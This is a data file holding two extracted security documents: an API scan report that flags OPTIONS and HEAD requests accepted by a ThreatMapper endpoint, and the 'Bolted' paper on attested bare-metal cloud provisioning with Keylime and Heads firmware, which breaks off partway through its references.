tag
dict
content
listlengths
1
171
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-19 16_03_58.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 16:03:58\nTime taken 00:05:00.716\nTotal scans performed: 2189\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" } ]
{ "category": "Provisioning", "file_name": "hotcloud18.pdf", "project_name": "Keylime", "subcategory": "Security & Compliance" }
[ { "data": "A Secure Cloud with Minimal Provider Trust\u0003\nAmin Mosayyebzadeh1, Gerardo Ravago1, Apoorve Mohan6, Ali Raza1, Sahil Tikale1,\nNabil Schear2, Trammell Hudson3, Jason Hennessey1;4,\nNaved Ansari1, Kyle Hogan5, Charles Munson2,\nLarry Rudolph3, Gene Cooperman6, Peter Desnoyers6, Orran Krieger1\n1Boston University, Boston, MA2MIT Lincoln Laboratory, Lexington, MA3Two Sigma, New York, NY4NetApp Inc.\n5MIT, Cambridge, MA6Northeastern University, Boston, MA\nAbstract\nBolted is a new architecture for a bare metal cloud with the\ngoal of providing security-sensitive customers of a cloud\nthe same level of security and control that they can obtain in\ntheir own private data centers. It allows tenants to elastically\nallocate secure resources within a cloud while being protected\nfrom other previous, current, and future tenants of the cloud.\nThe provisioning of a new server to a tenant isolates a bare\nmetal server, only allowing it to communicate with other\ntenant’s servers once its critical firmware and software have\nbeen attested to the tenant. Tenants, rather than the provider,\ncontrol the tradeoffs between security, price, and performance.\nA prototype demonstrates scalable end-to-end security with\nsmall overhead compared to a less secure alternative.\n1 Introduction\nDespite all the advantages of today’s public clouds, many se-\ncurity sensitive organizations are reluctant to use them because\nof their security challenges and the trust that the tenant needs\nto place in the cloud provider. Can we make a cloud that is\nappropriate for even the most security sensitive tenants? Can\nwe make a cloud where the tenant does not need to fully trust\nthe provider? Can we do this without hurting the performance\nof tenants that do not wish to pay for extra security?\nThe key security challenge of Infrastructure-as-a-Service\n(IaaS) clouds stems from collocating multiple tenants on a sin-\ngle physical node with virtualization. Malicious tenants can ex-\n\u0003DISTRIBUTION STA TEMENT A. Approved for public release: distribution\nunlimited. This material is based upon work supported by the Assistant Secretary of De-\nfense for Research and Engineering under Air Force Contract No. FA8721-05-C-0002\nand/or FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations\nexpressed in this material are those of the author(s) and do not necessarily reflect the\nviews of the Assistant Secretary of Defense for Research and Engineering. Delivered to\nthe U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013\nor 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in\nthis work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed\nabove. Use of this work other than as specifically authorized by the U.S. Government\nmay violate any copyrights that exist in this work.ploit vulnerabilities in the huge trusted computing base (TCB)\nto launch attacks on tenants running on the same node [29]\nor even worse, if the attacker compromises the hypervisor, to\nlaunch attacks on the cloud provider. Moreover, virtualization\nenables side-channel and covert channel attacks such as the\nrecent Meltdown and Spectre exploits [31, 34, 35, 44, 45].\nRecent processor secure enclave technology Intel SGX\nhas suffered from its own security challenges from the\ncollocation of multiple tenants [10, 16, 33, 40, 52]. Such\nsecurity concerns keep huge sections of the economy, such\nas medical companies and hospitals, financial institutions,\nfederal agencies etc., from being able to take advantage of\nthe benefits of today’s clouds. [6,8,11,42]1\nBare metal clouds [27, 28, 41, 43, 48] remove the threat\nof side-channel attacks and covert channels implicit in\nvirtualization. However, all the existing bare metal clouds\nstill require the tenant to fully trust the provider which may\nnot always be a safe assumption. Consider how one protects\nagainst server firmware attacks. If a prior tenant of a node is\nable to inject malicious firmware, this modified firmware can\nbe used to attack future tenants of that server. Existing clouds\nprotect against firmware attacks on the tenant’s behalf [15,27]\nbut there is no way for the tenant to verify, for example, that\nthe provider was not compromised or even has installed all\nfirmware security patches.\nBolted differs from today’s bare metal clouds by reducing\nthe implicit trust in the provider. Bolted allows a tenant to elas-\ntically carve out a secure private enclave of commodity phys-\nical servers in which she may run applications. The enclave\nis protected from previous users of the same servers (using\nhardware-based attestation), concurrent tenants of the cloud\n(using network isolation and encryption), and future users of\nthe same servers (using storage encryption and memory scrub-\n1IARPA recently released RFI [7] describing the requirements of\none security-sensitive community to replicating as closely as possible\nthe properties of an air-gapped private enclave . We believe that meeting\nthis requirement would alleviate the concerns of a broad community of\nsecurity-sensitive customers, making the geographical distribution, elasticity,\nand on-demand pricing of cloud available to a wide community of users.bing). With Bolted an organization with security expertise is\nable to deploy their own attestation infrastructure, and can di-\nrectly validate the measurements against their expectations of\nfirmware and software deployed. Each Bolted component ad-\ndresses a different potential vulnerability. It is the combination\nof Bolted components that minimizes the role of the provider\nto mostly that of securing the physical access to the hardware.\nWe have implemented a prototype of Bolted and demon-\nstrate that the prototype can provision an enclave of sixteen\nservers with a full application environment with legacy servers\nand firmware in around 8 minutes, enabling highly elastic\nenvironments. We show that the overhead to do attestation\nwith Bolted is low, adding only 25% to the cost of a highly\noptimized provisioning system. Replacing traditional UEFI\nfirmware with a customized Linux-based firmware we devel-\noped for this service, we further improve the security of the\nuser and reduce provisioning time to being around 10% faster\nthan the unattested version; a node can be fully provisioned\nwith a full application environment in just over 3 minutes.\n2 Threat Model\nOur goal in Bolted is to enable tenants to strongly isolate\nthemselves from other tenants while placing as little trust in\nthe provider as possible. Specifically, we trust the provider\nto maintain the physical security of the hardware, so physical\nattacks like bus snooping or de-capping chips are out of scope.\nWe also trust the provider for availability of the network\nand node allocation services and any network performance\nguarantees. We assume that all cloud provider nodes are\nequipped with Trusted Platform Modules (TPMs) [5].\nWe categorize the threats that the tenant faces into the\nfollowing phases:\nPrior to occupancy: Malicious (or buggy) firmware can\nthreaten the integrity of the secure enclave of which the node\nbecomes a part. We must ensure that a previous tenant (e.g., by\nexploiting firmware bugs) or cloud provider insider (e.g., by\nunauthorized firmware modification) did not infect the node’s\nfirmware prior to the tenant receiving it. Further, we must\nensure that the node being booted is isolated from potential at-\ntackers until it is fully provisioned and all defenses are in place.\nDuring occupancy: Although many side-channel attacks\nare avoided by disallowing concurrent tenants on the same\nserver, we must ensure that the node’s network traffic is\nisolated so that the provider or other concurrent tenants of\nthe cloud cannot launch attacks against it or eavesdrop on its\ncommunication with other nodes in the enclave. Moreover,\nif network attached storage is used (as in our implementation)\nall communication between storage and the node must be\nsecured.\nAfter occupancy: We must ensure that the confidentiality\nof a tenant is not compromised by any of its state (e.g, storage\nor memory) being visible to subsequent software running on\nthe node.3 Design Philosophy\nA central design principle of Bolted is to enable as much func-\ntionality as possible to be implemented by the tenant rather\nthan by the provider for three reasons: (i) to minimize the\ntrust that a tenant needs to place in the provider, (ii) to enable\ntenants with specialized security expertise and requirements\nto implement functionality themselves, and (iii) to enable\ntenants to make their own cost/performance/security tradeoffs.\nThis principle has a number of implications for our design.\nFirst, Bolted differs from existing bare metal offerings in\nthat most of the component services that make up Bolted can\nbe operated by a tenant rather than by the provider. A security\nsensitive tenant can customize or replace these services. All\nthe logic, that orchestrates how different services are used\nto securely deploy a tenant’s software, is implemented using\nscripts that can be replaced or modified by the user.\nSecond, while we expect a provider to secure and isolate the\nnetwork and storage of tenants, we only rely on the provider\nfor availability and not for the confidentiality or integrity of\nthe tenant’s computation. In the most secure deployments,\nwe assume that Bolted tenants will further encrypt all\ncommunication between the tenants’ nodes and between\nthose nodes and storage. Bolted provides a (user-operated)\nservice to securely distribute keys for this purpose.\nThird, we rely on attestation (measuring all firmware\nand software and ensuring that it matches known good\nvalues) that can be implemented by the tenant rather than\njust validation (ensuring that software/firmware is signed by a\ntrusted party). This is critical for firmware which may contain\nbugs [12, 20, 24, 25, 46, 49] that can disrupt tenant security.\nAttestation provides a time-of-use proof that the provider has\nkept the firmware up to date. More generally, we attest through\nthe process of incorporating a node into an enclave, and we\ncan also continuously attest when the node is operating, to\nensure that bugs in any layer of software (irrespective of who\nsigned them) have not allowed malicious code to be executed.\nFourth, we have a strong focus on keeping our software as\nsmall as possible and making it all available via open source.\nIn some cases, we have written our own highly specialized\nfunctionality rather than relying on larger function rich general\npurpose code in order to achieve this goal. For functionality\ndeployed by the provider, this is critical to enable it to be\ninspected by tenants to ensure that any requirements are met.\nFor example, previous attacks have shown that firmware se-\ncurity features are difficult to implement bug-free – including\nfirmware measurements being insufficient [13], hardware\nprotections against malicious devices not being in place [38],\nand dynamic root of trust (DRTM) implementation flaws [51].\nFurther, our firmware is deterministically built, so that the\ntenant can not only inspect it for correct implementation but\nthen attest that this is the firmware that is actually executing\non the machine assigned to the tenant. For tenant deployed\nfunctionality, small open source implementations are valuableto enable user-specific customization.\n4 Architecture\nThe architecture of Bolted and the sequence that a node goes\nthrough as part of being admitted to a tenant enclave is shown\nin Figure 1. The state of the node changes as a result of its\ninteraction with the three main services that comprise the\nBolted system. Like any bare metal offering, Bolted requires,\nanisolation service which allocates nodes and configures\nnetworks to isolate those nodes from nodes of other tenants\nand a provisioning service to provision the user’s operating\nsystem and applications onto the allocated nodes. The Bolted\narchitecture adds a third: an Attestation Service .\nThe attestation service consists of a server and a client\ncomponent that runs in the firmware of the node. The\nserver is responsible for: 1) maintaining a whitelist of trusted\nfirmware/software measurements, 2) comparing quotes (hash\nmeasurements signed by the TPM) of firmware/software\nagainst the whitelist, 3) maintaining a registry of TPM to\nnode mappings to verify quotes by the TPM and ensure that\nthe quotes are coming from an expected node in the cloud, and\n4) distributing keys to nodes so that they may encrypt commu-\nnication between them as well as securely accessing storage.\nThe client component is responsible for participating the\nnode in the attestation protocol. On boot, the hardware mea-\nsures the first portion of firmware that in turn measures the re-\nmainder of the firmware and the next code (e.g., a bootloader)\nbefore it is executed. That code in turn loads, measures and\nthen executes subsequent software, etc. These measurements\nare all stored in the TPM. The client obtains quotes from\nthe TPM, i.e., cryptographically signed measurements of the\nfirmware and software that are loaded and executed on the\nnode. The client securely provides the quotes to the attesta-\ntion server, which then matches them to its whitelist. The\ncompromised software will not match the whitelist and the\ninfected node will be rejected. Upon successful attestation, the\nverifier securely provides the node a cryptographic key that\ncan bootstrap encrypted storage and network isolation. At this\npoint, the node is acquired by the tenant. It is critical that client\nfirmware and software be open, simple, verifiable, and, ideally,\ndeterministically built to enable reliable and secure attestation.\n5 Implementation\nWe have developed a prototype of the Bolted architecture.\nHere, we briefly describe the implementation components\nof the three main services, the node firmware we use and how\nthese components work together.\nHardware Isolation Layer: The Hardware Isolation Layer\n(HIL) [21] is our implementation of the Bolted isolation\nservice. The fundamental operations HIL provides are (i)\nallocation of physical nodes, (ii) allocation of networks, and\n(iii) connecting these nodes and networks. A tenant can invoke\nHIL to allocate nodes to an enclave, create a management\nIsolation \nService Attestation \nService Provisioning \nService \nFree Pool \nAirlock \nRejected Pool \nTenant Enclave \n4 Download \nbootloader and client \nside attestation \nsoftware Attest Node’s \nFirmware \nIf Attestation \nfails: moves the \nnode to rejected \npool If Attestation passes: \nmove the node \nto tenant’s \nenclave \nProvision \nthe node \nwith tenant’s \nOS and \napplications Allocate a node \nand move it into \nAirlock which is \na quarantined \nstate where node \nis isolated 1 3 5 \n6 7 \n2 \nRun Secure \nFirmware Figure 1: Bolted’s architecture: Blue arrows show state\nchanges and green dotted lines show actions taken by each\nservice.\nnetwork between the nodes, and then connect this network to\nany provisioning tool (e.g., [9,14,17,36]). She can then create\nadditional networks for isolated communication between\nnodes and/or attach those nodes to public networks made\navailable by the provider. HIL is a very simple service\n(approximately 3000 LOC). It creates networks (currently\nVLANs [26]) and attaches nodes to them by interacting with\nthe switches of the provider.\nMalleable Metal as a Service: The Malleable Metal-as-a-\nService (M2) [36] is our implementation of the Bolted provi-\nsioning service. The fundamental operations M2 provides are:\n(i) create (disk) image, (ii) clone and snapshot an image, (iii)\ndelete an image, and (iv) boot a node from an image. Similar\nto virtualized cloud services, M2 services images from\nremote-mounted boot drives. Images are exposed to the nodes\nvia an iSCSI (TGT [19]) service managed by M2 and stored in\na Ceph [50] distributed file system. As published previously,\nM2 is between 3-4 times faster than traditional provisioning\nsystems that install an image into a server’s local disk [36].\nKeylime: Keylime [47] is our implementation of the\nBolted attestation service. It is divided into four components:\nRegistrar, Cloud V erifier, Client and Tenant. The registrar\nmaintains the node to TPM mapping. The verifier maintains\nthe whitelist of trusted code and checks nodes’ integrity. The\nKeylime client is downloaded and measured by the node\nfirmware and then passes quotes from the node’s TPM to the\nverifier. Keylime Tenant starts the attestation process and asks\nV erifier to verify the node which runs Keylime client.\nHeads: Heads [23] is our firmware implementation and\nbootloader replacement. It is a minimal deterministically\nbuilt version of Linux that (i) zeroes all node memory,\n(ii) downloads the Keylime client, and (if attestation has\nsucceeded) (iii) downloads and kexecs to a tenant’s kernel.\nIn the future, we expect to directly mount the iSCSI disk fromUn-Attested\n stock UEFIAttested\n stock UEFIAttested Heads0100200300400Single Node\nProvisioning Times (Seconds)Power-On-Self-Test (POST)\nPXE\nChainboot into iSCSI\ntarget using iPXE\nHeads Download\n and Measurement(iPXE)\nHeads BootingDownload Keylime Client\nAttestation\nMoving to enclave\nKexec into attested\nkernel and bootFigure 2: Performance with and without Bolted for systems\nwith stock UEFI firmware.\nM2 to obtain the kernel, but currently, we fetch the kernel\nfrom a web service stood up for this purpose.\nPutting it together: The booting of a node is controlled by\na Python application that follows the sequence of steps shown\nin Figure 1. Secure OS images contain a Keylime client that\nobtains a key to encrypt network traffic between nodes in\nthe enclave as well as traffic to the boot disk mounted using\niSCSI. For servers that support it, we burn Heads directly\ninto the server’s flash, and for the other servers, we download\nHeads from a PXE service stood up for this purpose and\nthen continue the same sequence as if Heads was burned into\nthe flash. We have modified iPXE client code to measure\nthe downloaded Heads image into a TPM register so that all\nsoftware involved in booting a node can be attested.\n6 Evaluation\nWe show performance results from our initial prototype im-\nplementation of Bolted. Timing breakdowns are shown using\na Dell R630 server with 256 GB RAM and 2 2.6GHz 10 (20\nHT) core Intel Xeon processors model E5-2660 v3. We have\nphysical access to this server in our lab and show experiments\nwith both stock UEFI firmware and our own Heads firmware.\nScalability experiments are shown on 16 Dell M620 blade\nserves with 64 GB memory and 2 2.60GHz 8 (16 HT) core\nXeon E5-2650 v2 processors connected to a 10Gbit switch.\nFigure 2 shows the timing breakdown of different stages\nof provisioning a 20 GB image of pre-installed linux with\nBolted. The three scenarios are: 1) an unattested boot that\njust uses M2 to directly boot a users image, 2) fully attested\nboot with stock UEFI firmware, and 3) fully attested boot\nwith Heads burnt into the flash.\nWithout Bolted’s security features, a server node provi-\nsioning via M2 takes three steps: Power-on-self-test (POST),\nPXE, and then chainbooting from an iSCSI target using iPXE.The total time is under 4 minutes with 2.5 minutes spent in\nthe POST step alone.\nFor full attestation using stock UEFI firmware, after\nPOST, Bolted goes through the following phases: (i) PXE\ndownloading iPXE, (ii) iPXE downloading and measuring\nHeads, (iii) booting Heads, (iv) download the Keylime client\n(currently using http) and measuring it, (v) running the\nKeylime client, registering the node and attesting it, and then\ndownloading (currently using http) and measuring the tenants\nkernel, (vi) moving the node into the tenants enclave and, and\nfinally (vii) Heads kexec to the tenants kernel and it is booted2.\nWith all these steps the total time to provision a server is just\nover 5 minutes or around 25% more than the unattested boot.\nFor full attestation using Heads firmware, after POST we\nimmediately jump to step 4 above. Heads posts in just under\na minute (almost half of which on this server is a timeout\nwaiting for Intel Management Engine to initialize). With\nHeads burned into the firmware total provisioning time is 35%\nfaster than the fully attested case with stock firmware and\neven 10% faster than the unattested case with stock firmware.\n2 4 6 8 10 12 14 16\nNumber of bare-metal nodes provisioned concurrently0100200300400500600Time (Seconds)Bolted Provisioning Time\nM2 Provisioning Time\nFigure 3: Scaling Results.\nFigure 3 shows (with UEFI firmware) the scalability of\nBolted with and without attestation as we increase the number\nof concurrently booting nodes. Each experiment was run five\ntimes, and the line shows the degradation in performance\nfor the average of those runs as we increase the number of\nnodes from one to sixteen. With sixteen servers booting\nconcurrently, performance degrades by around 50 seconds for\nthe unattested case and around 100 seconds for the attested\ncase. Degradation in the unattested experiments is due to a\nlarge number of concurrent block requests to the small scale\nCeph deployment (with only 27 disks). Experiments [36]\nwith a larger scale Ceph deployment demonstrated better M2\nscalability. Performance of a fully attested boot degrades by\nonly 13% as we move to 16 servers.\n2This implementation is a very early prototype, and we expect to be able\nto speed up steps 4 and 5 by incorporating iSCSI drivers into our Heads\nimplementation.7 Discussion\nIn this paper, we describe Bolted, an architecture for a bare\nmetal cloud that is appropriate for even the most security sensi-\ntive tenants. For these tenants, Bolted enables protection from\nattacks: (i) prior to occupancy using attestation to ensure that\nany nodes with compromised firmware are rejected and by\nisolating nodes (in airlocks) until they can be added to tenant\nenclaves, (ii) during occupancy by allocating entire servers to\navoid virtualization attacks and by providing a secure model\nto distribute tenant keys for encrypting storage and network\ntraffic, (iii) after occupancy by using firmware that scrubs\nmemory prior to booting other software and using M2 for\nnetwork mounted storage. The only trust these tenants need\nto place in the provider is: (a) the availability of the resources\nand (b) that the physical hardware has not been compromised.\nThe only Bolted service that needs to be deployed by a\nprovider is the isolation service (e.g., HIL), which needs to be\ntrusted by the provider to control the physical switches. All\nother services can be deployed by a tenant or on their behalf\nby a third party and the orchestration to enable an attested boot\nis managed by scripts controlled by the tenant. This means\nthat a security sensitive tenant can operate these services in\ntheir own environment. Customers with specialized needs\nmay choose to develop their own variants of these services.\nThe cost/complexity/performance/security trade-offs are\nfully under the tenants control. A tenant that doesn’t want\nthe cost and complexity to deploy their own instance of\nKeylime and M2, or that wants to take advantage of a\nlarge-scale implementation by the provider, can choose to\ntrust provider-deployed versions of these services. Also, if\na tenant chooses to trust the network isolation of the provider\n(e.g. HIL) he/she may feel no need to encrypt network\nand/or storage traffic. Finally, tenants that are willing to trust\nfirmware validation (e.g. firmware is bug-free and signed by\nthe vendor) are free to do that and will not incur any of the\nperformance overhead of attestation.\nTo enable a wide community to inspect them and minimize\ntheir TCB, all components of Bolted are open source,\nincluding Keylime [4], Heads [22], M2 [2], and HIL [1]. We\ndesigned HIL, for example, to be a simple micro-service\nrather than a general purpose tool like IRONIC [17] or\nEmulab [9]. HIL is being incorporated into a variety of\ndifferent use cases by adding tools and services on and around\nit rather than turning it into a general purpose tool. Another\nkey example of a small open source component is Heads.\nHeads is much simpler than UEFI. Since it is based on Linux,\nit has a code base that is under constant examination by a\nhuge community of developers. Heads is reproducibly built,\nso a tenant can examine the software to ensure that it meets\ntheir security requirements and then ensure that the firmware\ndeployed on machines is the version that they require. For\nexample, the firmware must measure all of itself before\nlaunching the next level of software. As another example, weneed to make sure that firmware zeros all the memory of a\nserver before enabling subsequent software to run3.\nWe are not able to flash Heads on all servers, and the\nservers we have flashed it on require physical access [23].\nHowever, we are working with the OpenCompute community\nto both enable Heads to be flashed remotely and to ensure\nthat OpenCompute vendors provide Heads as a supported\noption; it is enormously difficult without vendor support\nto ensure that servers with minor changes will successfully\nboot. If we cannot flash our own firmware, Bolted uses\nstock firmware to download Heads. In this situation, Heads\nprovides us with a standardized execution environment for\nthe Keylime client and download the tenant kernel. While we\nhave no guarantee that the stock firmware is up-to-date and\nfully measured, in this situation Bolted provides attestation\nagainst the white list of the most up-to-date firmware to\nensure known vulnerabilities have been addressed.\nBolted protects against compromise of firmware executable\nby the system CPU; however modern systems may have other\nprocessors with persistent firmware inaccessible to the main\nCPU; compromise of this firmware is not addressed by this\napproach. These include: Base Management Controllers\n(BMCs) [37], the Intel Management Engine [18,32,39], PCIe\ndevices with persistent flash-based firmware, like some GPUs\nand NICs, and storage devices [30]. Additional work (e.g.\ntechniques like IOMMU use, disabling the Management\nEngine [3] and the use of systems without unnecessary\nfirmware) may be needed to meet these threats.\nWhile it is a work in progress, our early scalability results\nare encouraging, even in an initial prototype on a testbed\nwith several known performance and scalability issues. They\nsuggest that a complete implementation of Bolted with Heads\nburned into the firmware and a larger scale storage backend\nwill enable us to elastically provision dozens, perhaps even\nhundreds of fully attested servers in under five minutes. If we\ncan achieve this, it will make Bolted appropriate for highly-\nelastic security-sensitive situations, e.g., a national emergency\nrequiring many computers. This will hugely reduce the need\nfor institutions that keep around large numbers of largely idle\nmachines to deal with low probability events.\n8 Acknowledgment\nWe would like thank Intel, Red Hat, Two Sigma, NetApp and\nCisco, the core industry partners of MOC for supporting this\nwork. We gratefully acknowledge Piyanai Saowarattitada and\nRadoslav Nikiforov Milanov for their significant contributions\nin development and their assistance in the evaluations. Partial\nsupport for this work was provided by the USAF Cloud Anal-\nysis Model Prototype project, National Science Foundation\nawards CNS-1414119, ACI-1440788 and OAC-1740218.\n3We need to zero memory in the firmware since a malicious provider\nmay steal a server from a tenant at any point and we need to make sure that\nall state is removed from the node before the next tenant can see it.References\n[1]hil: Hardware Isolation Layer, formerly Hardware as a Service.\nhttps://github.com/CCI-MOC/hil.\n[2]Malleable Metal as a Service (M2). https://github.com/CCI-MOC/M2.\n[3]mecleaner: Tool for partial deblobbing of intel me/txe firmware\nimages. https://github.com/corna/me cleaner.\n[4]python-keylime: Bootstrapping and Maintaining Trust in the Cloud.\nhttps://github.com/mit-ll/python-keylime.\n[5]Trusted Platform Module (TPM) Summary. https:\n//trustedcomputinggroup.org/trusted-platform-module-tpm-summary/,\nApr. 2008.\n[6]4 major reasons some organizations are still reluctant to move to the\ncloud jLogicalis. http://www.hypeorripe.com/2013/11/13/4-major-\nreasons-some-organizations-are-still-reluctant-to-move-to-the-cloud,\n2013.\n[7]Creating a Classified Processing Enclave in the Public Cloud jIARPA.\nhttps://www.iarpa.gov/index.php/working-with-iarpa/requests-for-\ninformation/creating-a-classified-processing-enclave-in-the-public-\ncloud, 2017.\n[8]Report to the President on Federal IT Modernization - Introduction to\nthe Report. https://itmodernization.cio.gov/, 2017.\n[9]ANDERSON , D. S., H IBLER , M., S TOLLER , L., S TACK , T., AND\nLEPREAU , J.Automatic online validation of network configuration in\nthe emulab network testbed. In Autonomic Computing, 2006. ICAC’06.\nIEEE International Conference on (2006), IEEE, pp. 134–142.\n[10] BRASSER , F., M ¨ULLER , U., D MITRIENKO , A., K OSTIAINEN , K.,\nCAPKUN , S., AND SADEGHI , A. Software grand exposure: SGX\ncache attacks are practical. CoRR abs/1702.07521 (2017).\n[11] BUCCI , S.Getting Cyber Serious: Mastering the Challenges of Federal\nCloud Computing. The Heritage F oundation .\n[12] BULYGIN , Y., L OUCAIDES , J., F URTAK , A., B AZHANIUK , O., AND\nMATROSOV , A. Summary of attacks against BIOS and secure boot.\nDefcon-22 (2014).\n[13] B UTTERWORTH , J., K ALLENBERG , C., K OVAH , X., AND HERZOG ,\nA.BIOS Chronomancy: Fixing the core root of trust for measurement.\nInProceedings of the 2013 ACM SIGSAC Conference on Computer\n& Communications Security (New Y ork, NY , USA, 2013), CCS\n’13, ACM, pp. 25–36.\n[14] C ANONICAL . Metal as a service. urlhttps://maas.ubuntu.com/.\n[15] CORPORATION , I. A Trusted Cloud Solution from HyTrust,\nVMware, and Intel. https://www.intel.com/content/www/us/en/cloud-\ncomputing/path-to-secure-compliant-trusted-cloud-brief.html, 2016.\n[16] COSTAN , V., L EBEDEV , I., AND DEVADAS , S.Sanctum: Minimal\nhardware extensions for strong software isolation. In USENIX Security\n(2016), vol. 16, pp. 857–874.\n[17] DER VEEN ET AL ., D. V. Openstack ironic wiki. url-\nhttps://wiki.openstack.org/wiki/Ironic.\n[18] ERMOLOV , M., AND GORYACHY , M. How to hack a turned - off\ncomputer, or running unsigned code in intel management engine.\nhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-\nHow-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-\nCode-In-Intel-Management-Engine.pdf, Dec 2017.\n[19] FUJITA , T., AND CHRISTIE , M. tgt: Framework for storage target\ndrivers. In Proceedings of the Linux Symposium (2006), vol. 1, Citeseer,\npp. 303–312.\n[20] HEASMAN , J.Rootkit threats. Network Security 2006 , 1 (2006), 18–19.\n[21] HENNESSEY , J., T IKALE , S., T URK, A., K AYNAR , E. U., H ILL, C.,\nDESNOYERS , P., AND KRIEGER , O.HIL: Designing an exokernel for\nthe data center. In Proceedings of the 7th ACM Symposium on Cloud\nComputing (SoCC’16) (Santa Clara, CA, Oct. 2016).[22] HUDSON , T. heads: A minimal Linux that runs as a coreboot or\nLinuxBoot ROM payload to provide a secure, flexible boot environment\nfor laptops and servers. https://github.com/osresearch/heads.\n[23] H UDSON , T. Heads Webpage. https://trmm.net/Heads.\n[24] HUDSON , T., K OVAH , X., AND KALLENBERG , C. ThunderStrike\n2: Sith Strike. Black Hat USA Briefings (2015).\n[25] HUDSON , T., AND RUDOLPH , L. Thunderstrike: EFI firmware\nbootkits for Apple Macbooks. In Proceedings of the 8th ACM\nInternational Systems and Storage Conference (2015), ACM, p. 15.\n[26] IEEE . 802.1q-2014 - bridges and bridged networks.\nhttp://www.ieee802.org/1/pages/802.1Q-2014.html.\n[27] INC., A. W. S. Amazon EC2 Bare Metal Instances with Direct Access\nto Hardware. https://aws.amazon.com/blogs/aws/new-amazon-ec2-\nbare-metal-instances-with-direct-access-to-hardware/, 2017.\n[28] INTERNAP . Bare-metal AgileSERVER. http://www.internap.com/bare-\nmetal/, 2015.\n[29] KING, S. T., AND CHEN, P. M. Subvirt: Implementing malware with\nvirtual machines. In Security and Privacy, 2006 IEEE Symposium on\n(2006), IEEE, pp. 14–pp.\n[30] KIRK, J. Destroying your hard drive is the only way to stop this\nsuper-advanced malware. https://www.pcworld.com/article/2884952/\nequation-cyberspies-use-unrivaled-nsastyle-techniques-to-hit-iran-\nrussia.html, Feb 2015.\n[31] KOCHER , P., G ENKIN , D., G RUSS , D., H AAS, W., H AMBURG ,\nM., L IPP, M., M ANGARD , S., P RESCHER , T., S CHWARZ , M., AND\nYAROM , Y.Spectre attacks: Exploiting speculative execution. ArXiv\ne-prints (Jan. 2018).\n[32] KROIZER , A. Tpm and intel ptt overview. http://tce.webee.\needev.technion.ac.il/wp-content/uploads/sites/8/2016/01/AK TPM-\noverview-technion.pdf, Sep 2015.\n[33] LEE, S., S HIH, M., G ERA, P., K IM, T., K IM, H., AND PEINADO , M.\nInferring fine-grained control flow inside SGX enclaves with branch\nshadowing. CoRR abs/1611.06952 (2016).\n[34] LIPP, M., S CHWARZ , M., G RUSS , D., P RESCHER , T., H AAS,\nW., M ANGARD , S., K OCHER , P., G ENKIN , D., Y AROM , Y., AND\nHAMBURG , M. Meltdown. ArXiv e-prints (Jan. 2018).\n[35] LIU, F., Y AROM , Y., G E, Q., H EISER , G., AND LEE, R. B. Last-level\ncache side-channel attacks are practical. In 2015 IEEE Symposium on\nSecurity and Privacy (May 2015), pp. 605–622.\n[36] MOHAN , A., T URK, A., G UDIMETLA , R., T IKALE , S., H ENNESSEY ,\nJ., K AYNAR , U., G.C OOPERMAN , DESNOYERS , P., AND KRIEGER ,\nO. M2: Malleable Metal as a Service. ArXiv e-prints (2018).\n[37] MOORE , H. A penetration tester’s guide to ipmi and bmcs. https:\n//blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/,\nAug 2017.\n[38] MORGAN , B., A LATA , E., N ICOMETTE , V., AND KANICHE , M.\nBypassing IOMMU protection against I/O attacks. In 2016 Seventh\nLatin-American Symposium on Dependable Computing (LADC) (Oct\n2016), pp. 145–150.\n[39] NEWMAN , L. H. Intel chip flaws leave millions of devices\nexposed. https://www.wired.com/story/intel-management-engine-\nvulnerabilities-pcs-servers-iot/, Nov 2017.\n[40] O’K EEFFE , D., M UTHUKUMARAN , D., A UBLIN , P.-L., K EL-\nBERT , F., P RIEBE , C., L IND, J., Z HU, H., AND PIETZUCH , P.\nspectre-attack-sgx. https://github.com/lsds/spectre-attack-sgx.\n[41] PACKET . The promise of the cloud delivered on bare metal.\nhttps://www.packet.net, 2017.\n[42] PAQUETTE , S., J AEGER , P. T., AND WILSON , S. C. Identifying the\nsecurity risks associated with governmental use of cloud computing.\nGovernment Information Quarterly 27 , 3 (July 2010), 245–253.[43] RACKSPACE . Rackspace Cloud Big Data OnMetal.\nhttp://go.rackspace.com/baremetalbigdata/, 2015.\n[44] RAZAVI , K., G RAS, B., B OSMAN , E., P RENEEL , B., G IUFFRIDA ,\nC.,AND BOS, H.Flip Feng Shui: Hammering a needle in the software\nstack.\n[45] RISTENPART , T., T ROMER , E., S HACHAM , H., AND SAVAGE , S.\nHey, you, get off of my cloud: exploring information leakage in\nthird-party compute clouds. In Proceedings of 